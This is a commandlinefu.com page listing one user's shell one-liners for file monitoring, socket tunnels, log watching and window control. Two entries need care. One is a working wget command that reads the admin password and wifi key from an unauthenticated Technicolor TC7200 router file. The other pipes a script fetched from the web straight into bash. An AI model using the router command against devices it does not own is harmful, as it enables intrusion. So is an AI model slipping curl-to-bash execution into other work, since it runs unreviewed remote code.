Commands by paulera

Commands by paulera (14)

sorted by

Monitor changed files into a log file, with day rotation, using fswatch (MacOS)

This command monitors changes in the current folder structure (subfolders included) and files, and log it into a hidden file in the same folder, called `.file_changes_YYMMDD.log`. Modify the `--exclude` parameters to define what should be skipped. Show Sample Output

fswatch --exclude=.git/* --exclude=.settings --event-flags --event-flag-separator=\; -t -f '%Y-%m-%d %H:%M:%S' . >> ./.file_changes_$(date +"%Y-%m-%d" | sed s/-//g).log

paulera · 2023-08-17 23:06:30 107

Process command output line by line in a while loop

This snippet allows to process the output of any bash command line by line.
This is sample output - yours may be different.
1

while read -r line; do echo $line; done < <(YOUR COMMAND HERE);

paulera · 2018-08-13 10:03:11 156
Linux socket-to-socket tunnel (MySQL example)

Won't work with password login. You must add your RSA key to the server's authorizedkeys file, or change the ssh command adding the -i option for a custom RSA key: socat "UNIX-LISTEN:/tmp/mysqld.temp.sock,reuseaddr,fork" EXEC:"ssh username@remoteserver.com -i /home/user/rsa-keys/id_rsa socat STDIO UNIX-CONNECT\:/var/run/mysqld/mysqld.sock" --- /tmp/mysqld.temp.sock will be created locally by socat, don't create it yourself. The folder it lives must be writable. Connect your MySQL client to this socket, with database and username set properly. --- In case you need to forward a remote socket to a LOCAL PORT instead, check http://www.commandlinefu.com/commands/view/9436/socat-tcp-listen5500-execssh-userremotehost-socat-stdio-unix-connectvarrunmysqldmysqld.sock
This is sample output - yours may be different.
0

socat "UNIX-LISTEN:/tmp/mysqld.temp.sock,reuseaddr,fork" EXEC:"ssh username@remoteserver.com socat STDIO UNIX-CONNECT\:/var/run/mysqld/mysqld.sock"

paulera · 2017-07-27 11:32:19 47
Watch PHP log, without knowing it's location (gets from php.ini)

Runs "php -i", filter the error_log location, then watches it using "tail"
This is sample output - yours may be different.
0

tail -v -f $(php -i | grep "^[ \t]*error_log" | awk -F"=>" '{ print $2; }' | sed 's/^[ ]*//g')

paulera · 2016-08-31 12:13:31 25
random git-commit message

Do a git commit using a random message. Show Sample Output
This is sample output - yours may be different.
```
"Just stop reading these for a while, ok.."
"We should delete this crap before shipping."
"Now added delete for real"
"fixed mistaken bug"
"Another bug bites the dust"
"Some bugs fixed"
"We'll figure it out on Monday"
```
17

git commit -m "$(curl -s http://whatthecommit.com/index.txt)";

paulera · 2016-05-04 09:51:18 30
Recover username and password for Technicolor TC7200 admin page (vulnerability)

The router Technicolor TC7200 has an exploit where the file http://192.168.0.1/goform/system/GatewaySettings.bin is open for unauthenticated access. Even though it is binary, the 2 last strings are the username and password for the pages for router management. It can be read using the 'strings' command, 'hexdump -C' or a hexadecimal editor. (default user/password = admin/admin) Reveals more configuration, including SSID name and Key for the wifi network: wget -q -O - http://192.168.0.1/goform/system/GatewaySettings.bin Hexadecimal dump of the file: wget -q -O - http://192.168.0.1/goform/system/GatewaySettings.bin | hexdump -C Show Sample Output
This is sample output - yours may be different.
```
admin
@dm1np@ssw0rd1234$#
```
3

wget -q -O - http://192.168.0.1/goform/system/GatewaySettings.bin | strings | tail -n 2

paulera · 2016-05-03 23:03:55 12
List latest 5 modified files recursively

The output format is given by the -printf parameter: %T@ = modify time in seconds since Jan. 1, 1970, 00:00 GMT, with fractional part. Mandatory, hidden in the end. %TY-%Tm-%Td %TH:%TM:%.2TS = modify time as YYYY-MM-DD HH:MM:SS. Optional. %p = file path Refer to http://linux.die.net/man/1/find for more about -printf formatting. ------------------------ sort -nr = sort numerically and reverse (higher values - most recent timestamp - first) head -n 5 = get only 5 first lines (change 5 to whatever you want) cut -f2- -d" " = trim first field (timestamp, used only for sorting) ------------------------ Very useful for building scripts for detecting malicious files upload and malware injections. Show Sample Output
This is sample output - yours may be different.
```
2016-03-22 06:16:03 ./www/sample.png
2016-03-22 02:30:32 ./http-logs/error.log
2016-03-11 01:48:14 ./wwww/index.php
2016-03-01 07:04:44 ./www/common/module.php
2016-02-25 02:47:29 ./readme.md
```
7

find . -type f -printf '%T@ %TY-%Tm-%Td %TH:%TM:%.2TS %p\n' | sort -nr | head -n 5 | cut -f2- -d" "

paulera · 2016-03-23 11:56:39 10
Safe Russian Roulette (only echo, don't delete files)

Shows "Bang!" in a chance of 1 out of 6, like in the original game with the gun (spin every round). Otherwise, echoes "Click...". If feeling brave you can also do: [ $[ $RANDOM % 6 ] == 0 ] && echo 'Bang!' && a really killer command || echo 'Click...' Show Sample Output
This is sample output - yours may be different.
```
Click...
Click...
Click...
Bang!
```
4

[ $[ $RANDOM % 6 ] == 0 ] && echo 'Bang!' || echo 'Click...'

paulera · 2016-03-23 11:09:56 28
Test remote SSH server status using telnet (no login required)

This command telnet and and looks for a line starting with "SSH" - works for OpenSSH since the SSH banner is something like "SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u3". Then it triggers an action accordingly. It can be packed as a script file to echo 0/1 indicating the SSH service availability: if [[ "$(sleep 1 | telnet -c <host> <port> 2>&1 | grep '^SSH')" == SSH* ]]; then echo 1; else echo 0; fi; Alternative uses: Trigger an action when server is UP (using &&): [[ "$(sleep 1 | telnet -c <host> <port> 2>&1 | grep '^SSH')" == SSH* ]] && <command when up> Trigger an action when server is DOWN (using ||): [[ "$(sleep 1 | telnet -c <host> <port> 2>&1 | grep '^SSH')" == SSH* ]] || <command when down>
This is sample output - yours may be different.
0

$if [[ "$(sleep 1 | telnet -c <host> <port> 2>&1 | grep '^SSH')" == SSH* ]]; then <command when up>; else <command when down>; fi;

paulera · 2016-02-02 13:06:51 16
Run bash script from web

Use this command to execute the contents of http://www.example.com/automation/remotescript.sh in the local environment. The parameters are optional. Alterrnatives to wget: CURL: curl -s http://www.example.com/automation/remotescript.sh | bash /dev/stdin param1 param2 W3M: w3m -dump http://www.example.com/automation/remotescript.sh | bash /dev/stdin [param1] [param2] LYNX: lynx -source http://www.example.com/automation/remotescript.sh | bash /dev/stdin [param1] [param2]
This is sample output - yours may be different.
0

wget -q -O - http://www.example.com/automation/remotescript.sh | bash /dev/stdin parameter1 parameter2

paulera · 2015-02-16 16:55:09 16
Show your local ipv4 IP

To show ipv6 instead, use [[ -6 ]] instead of [[ -4 ]] ip -o -6 a s | awk -F'[ /]+' '$2!~/lo/{print $4}' To show only the IP of a specific interface, in case you get more than one result: ip -o -4 a s eth0 | awk -F'[ /]+' '$2!~/lo/{print $4}' ip -o -4 a s wlan0 | awk -F'[ /]+' '$2!~/lo/{print $4}' Show Sample Output
This is sample output - yours may be different.
```
192.168.0.1
```
2

ip -o -4 a s | awk -F'[ /]+' '$2!~/lo/{print $4}'

paulera · 2015-02-13 11:19:31 11
Get ElasticSearch configuration and version details

Replace localhost:9200 with your server location and port. This is the ElasticSearch's default setup for local instances. Show Sample Output
This is sample output - yours may be different.
```
{
  "status" : 200,
  "name" : "node_name",
  "cluster_name" : "cluster_name",
  "version" : {
    "number" : "1.4.2",
    "build_hash" : "927caff6f05403e936c20bf4529f144f0c89fd8c",
    "build_timestamp" : "2014-12-16T14:11:12Z",
    "build_snapshot" : false,
    "lucene_version" : "4.10.2"
  },
  "tagline" : "You Know, for Search"
}
```
1

curl -XGET 'localhost:9200'

paulera · 2015-01-23 15:01:29 14
Maximize active window

Bind it to a shortcut key, using something like xbindkeys-config (if you do not have xbindkeys: apt-get install xbindkeys xbindkeys-config)
This is sample output - yours may be different.
0

wmctrl -r :ACTIVE: -b add,maximized_vert; wmctrl -r :ACTIVE: -b add,maximized_horz

paulera · 2013-04-24 16:59:04 11
Minimize active window

Bind it to some shortcut key, using something like xbindkeys-config (if you do not have xbindkeys: apt-get install xbindkeys xbindkeys-config)
This is sample output - yours may be different.
1

xdotool windowminimize $(xdotool getactivewindow)

paulera · 2013-04-24 16:56:08 7

What's this?

commandlinefu.com is the place to record those command-line gems that you return to again and again. That way others can gain from your CLI wisdom and you from theirs too. All commands can be commented on, discussed and voted up or down.

Share Your Commands

Check These Out

sniff network traffic on a given interface and displays the IP addresses of the machines communicating with the current host (one IP per line)

Make a server's console beep when the network is down

This is like ping -a, but it does the opposite. It alerts you if the network is down, not up. Note that the beep will be from the speaker on the server, not from your terminal. Once a second, this script checks if the Internet is accessible and beeps if it is not. I define the Net as being "UP", if I can ping Google's public DNS server (8.8.8.8), but of course you could pick a different static IP address. I redirect the beep to /dev/console so that I can run this in the background from /etc/rc.local. Of course, doing that requires that the script is run by a UID or GID that has write permissions to /dev/console (usually only root). Question: I am not sure if the -W1 flag works under BSD. I have only tested this under GNU/Linux using ping from iputils. If anybody knows how portable -W is, please post a comment.

Which processes are listening on a specific port (e.g. port 80)

swap out "80" for your port of interest. Can use port number or named ports e.g. "http"

Dump an aspell dictionary as a word list

Stores the certificate expiration date on the variable A

A trash function for bash

apt-get install trash-cli Commandline program that allows you put folders or files in the standard KDE/Unity desktop trash.

I hate `echo X | Y`

apart from not being generalisable to all shells, `Y <<< X` seems nicer to me than `echo X | Y`, e.g. $ <<< lol cat; it reads easier, you type less, and it also looks cool

Find the dates your debian/ubuntu packages were installed.

Find when debian packages were installed on a system.

print DateTimeOriginal from EXIF data for all files in folder

see output from `identify -verbose` for other keywords to filter for (e.g. date:create, exif:DateTime, EXIF:ExifOffset).

Print your cpu intel architecture family

Stay in the loop…

Follow the Tweets.

Every new command is wrapped in a tweet and posted to Twitter. Following the stream is a great way of staying abreast of the latest commands. For the more discerning, there are Twitter accounts for commands that get a minimum of 3 and 10 votes - that way only the great commands get tweeted.

» http://twitter.com/commandlinefu
» http://twitter.com/commandlinefu3
» http://twitter.com/commandlinefu10

Subscribe to the feeds.

Use your favourite RSS aggregator to stay in touch with the latest commands. There are feeds mirroring the 3 Twitter streams as well as for virtually every other subset (users, tags, functions,…):

Subscribe to the feed for:

» all commands
» commands with 3 up-votes (commandlinefu3)
» commands with 10 up-votes (commandlinefu10)
» commands by paulera